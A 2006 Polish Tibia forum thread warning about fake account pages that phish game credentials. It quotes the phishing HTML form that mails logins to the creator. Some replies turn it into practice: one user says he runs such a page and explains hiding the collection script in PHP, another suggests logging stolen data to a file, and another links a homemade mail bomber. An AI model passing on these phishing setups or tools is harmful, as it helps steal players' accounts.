|
Notki |
Inne To co nie pasuje do któregoś z działów a ma związek z Tibią trafia tutaj. |
![]() |
|
Opcje tematu |
![]() |
#1 |
Użytkownik forum
Data dołączenia: 05 03 2006
|
![]() Tak jak w temacie. Gracze (pseudo-hackerzy bo tak ich trzeba nazwać) robią strony wyglądające jak oficjalna strona Tibii (z polami na wpisanie account number'a i password'a - Strona wygląda jak "My account"). Strony te wabią ludzi tym że obiecują np: darmowy PACC na jakimś tam okres lub jakieś ekstra itemy (oczywiście wszystko za free bo, wystarczy tylko dać swoje passy i kliknąć na przycisk "Submit"). Lecz sprawa wygląda mniej kolorowo ponieważ gdy się kliknie na "Submit" twoje passy zamiast na tibia.com lecą na prywatne konto e-mail założyciela strony. Oczywiście mądżejszy gracz sprawdzi kod źródłowy tej strony i znajdzie linijkę z adresem na który są wysyłane jego passy. Ale ci "hackerzy" zabezpieczają sie przed tym stosując "ramki" na stronach (kto trochę kuma HTML'a to wie o co chodzi
![]() ![]() Podam przykład z Mozilli Forefox (bo IE nie używam) : - klikamy na stronie prawym przyciskiem myszy i wysuwa nam się menu podręczne - z menu wybieramy Ramka>Pokaż tylko ramkę lub Pokaż źródło ramki i znajdujemy tam takie linijki kodu : <form method="POST" action="http://free4web.pl/Form2Mail/"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="zwrtadr" value="http://tibia.4players.de/home/?subtopic=account"> <TABLE BORDER=0 CELLPADDING=1> <TR><TD>Number: </TD><TD><INPUT TYPE=password name="ID" SIZE=10 MAXLENGTH=10></TD></TR> <TR><TD>Password: </TD><TD><INPUT TYPE=password NAME="pass" SIZE=29 MAXLENGTH=29></TD></TR> </TABLE> "[email protected]" to adres na które wysyłane są passy gościa który się nabrał Ostatnio edytowany przez Raul - 12-04-2006 o 20:01. |
![]() |
![]() |
|
![]() |
#2 |
Użytkownik Forum
Data dołączenia: 14 04 2005
Lokacja: Lublin
Stan: Na Emeryturze
![]() |
![]() Taak ten temat dobry, ale te linki....
Jakis (powiedzmy) niedoswiadczony gracz moze tam wejsc bez czytania topicu. I co wtedy?? |
![]() |
![]() |
![]() |
#3 | |
Użytkownik forum
|
![]() Cytuj:
![]() ![]() |
|
![]() |
![]() |
![]() |
#4 |
Użytkownik Forum
Data dołączenia: 15 06 2005
Lokacja: Wawa
Stan: Aktywny Gracz
Profesja: Elder Druid
Świat: obsidia
Poziom: 9x
![]() |
![]() @topic
GZ za pomysł! Niech ludzie się uświadomią... mnie już raz hack spotkał (nie wiem jak bo na takie strny nie wchodziłem x/) i nie życzę tego nikomu innemu. @Kubon To niech się nauczą czytać ![]()
===> Only Obsidia - najlepsze fotki na forum ^^ <=== Ostatnio edytowany przez Raul - 12-04-2006 o 20:02. |
![]() |
![]() |
![]() |
#5 |
Użytkownik Forum
Data dołączenia: 21 12 2005
Lokacja: Wrocław
Świat: WoWscape
|
![]() Podając adresy powinieneś to robić tak, aby po kliknięciu na niego otwierała się jakaś bezpieczna strona... bo jeszcze ktoś kliknie, zapomni się i zaloguje sie ^.-
Ostatnio edytowany przez Raul - 12-04-2006 o 20:02. |
![]() |
![]() |
![]() |
#6 |
CS Tibia.pl Team
Data dołączenia: 06 09 1970
Lokacja: Gliwice
Wpisy bloga: 1
Stan: Początkujący
|
![]() Wogule nie podawaj przykladowych stron...
Pozatym jest setka tysięcy poradnikow na ten temat;/, no ale o takim sposobie malo kto wspomina, watpie zeby ktos tak sprawdzal, ale moze sie komus przyda ![]() |
![]() |
![]() |
![]() |
#7 |
Użytkownik forum
|
![]() OK poprawiłem te linki żeby nikt tam nie wszedł i się nie lognoł. Ale powiedzcie czy osoba która wchodzi na forum którego wogóle nieczyta tylko szuka linków żeby na nie wejść nieklasyfikuje się do grona noobów? Ja myślę że tak i myślę też że będzie miał/ła nauczkę za nieczytanie postów
![]() |
![]() |
![]() |
![]() |
#8 |
eX Moderator
Data dołączenia: 14 03 2004
Lokacja: Estadio Santiago Bernabéu
|
![]() Bez żadnych linków ani adresów do tego typu stron proszę.
![]() De las glorias deportivas que campean por España, Va el Madrid con su bandera, limpia y blanca que no empaña. Club castizo y generoso, todo nervio y corazón, Veteranos y noveles, veteranos y noveles, Miran siempre sus laureles con respeto y emoción. ¡Hala Madrid! ¡Hala Madrid! |
![]() |
![]() |
![]() |
#9 |
Użytkownik Forum
Data dołączenia: 08 08 2005
|
![]() podaj jescze link do mailbombera i juz bedzie git
![]() Ostatnio edytowany przez prywek - 12-04-2006 o 20:22. |
![]() |
![]() |
![]() |
#10 |
Użytkownik forum
Stan: Aktywny Gracz
Imię: Dargot oF Haz
Profesja: Knight
Świat: Neptera
Poziom: +20
Skille: 53/53
Poziom mag.: 3
|
![]() sprawa wyglada jano wystarczy 10 min zeby wejsci na jego poczte !
|
![]() |
![]() |
![]() |
#11 |
Użytkownik forum
Data dołączenia: 12 04 2006
Lokacja: Gdańsk
Stan: Aktywny gracz
Imię: Miszcz Wrotek
Gildia: ---
Świat: Antica
Poziom: 32
Poziom mag.: 37
|
![]() Prywek - http://rapidshare.de/files/17351143/uhm*********** mówisz i masz xD Mail bomber własnej roboty.
Btw, coś podobnego chciałem napisać ![]() |
![]() |
![]() |
![]() |
#12 |
Użytkownik Forum
Data dołączenia: 11 11 2004
Lokacja: Opole
![]() |
![]() Heh, osobiście sam mam taką pseudo stronke ;p ,
I powiedzieć moge że na 100 osób nabiera się średnio 10 ... więc to dość dużo (lvle 8-40). A co do tego że znajdziesz tam w kodzie źródłowym....jeśli jednak jest inna domena (przed tym zanim dojdzie sie do HOST'a). W źródle będzie podany link z domeny do hosta nastepnie trzeba w ten link wejsc, i masz zrodlo gotowe, znajdujesz maila i gotowe. JEst jednak ale... PHP :> <form method="POST" action="mail.php"> ![]() szybko, czysto i bezpiecznie :> Chyba ze ktos znajdzie mail.php ... ale watpie...jesli zastrzeszesz go haslem.. . Ostatnio edytowany przez Avager - 12-04-2006 o 22:10. |
![]() |
![]() |
![]() |
#13 |
Użytkownik Forum
Data dołączenia: 18 07 2004
Lokacja: Bełchatów
Stan: Niegrający
Imię: Pacek man
Profesja: Brak (Rookgaard)
Świat: Julera
|
![]() temat taki sobie recepta na to żeby nikt sie nie włamał na nasze konto jest o wiele prostsza. Nie wchodzić na nic innego tylko na tibie.com, nie ściągać niczego i nie używać dziwnych programów. 100% ze "hacka" nie będzie
ps. podoba mi sie stwierdzenie "ja ustrzec sie od hacka na konto" chyba każdy mi przyzna że sformułowane dość niefortunnie, rozbawiło mnie to [; 3maj sie
![]() |
#14 |
Użytkownik Forum
![]() |
![]() up:
Wiesz... www.tibla.com/forum/?subtopic~cos tam cos tam jak to szybko czytasz to sie nabierzesz ![]() ![]() |
![]() |
![]() |
![]() |
#15 |
Użytkownik forum
Data dołączenia: 12 04 2006
Lokacja: Gdańsk
Stan: Aktywny gracz
Imię: Miszcz Wrotek
Gildia: ---
Świat: Antica
Poziom: 32
Poziom mag.: 37
|
![]() Imo fake'i na maila sa denne, lepiej zrobic prosty skrypcik w php ktory dodaje dane z formularza do jakiegos pliku txt.
|
![]() |
![]() |
![]() |
#16 |
Użytkownik Forum
|
![]() czy mi sie wydaje, czy takich tematów było dość sporo?
![]() Ostatnio edytowany przez Nikast Shynix - 12-04-2006 o 22:54. |
![]() |
![]() |
![]() |
#17 |
Użytkownik Forum
![]() |
![]() Wydaje Ci sie.
|
![]() |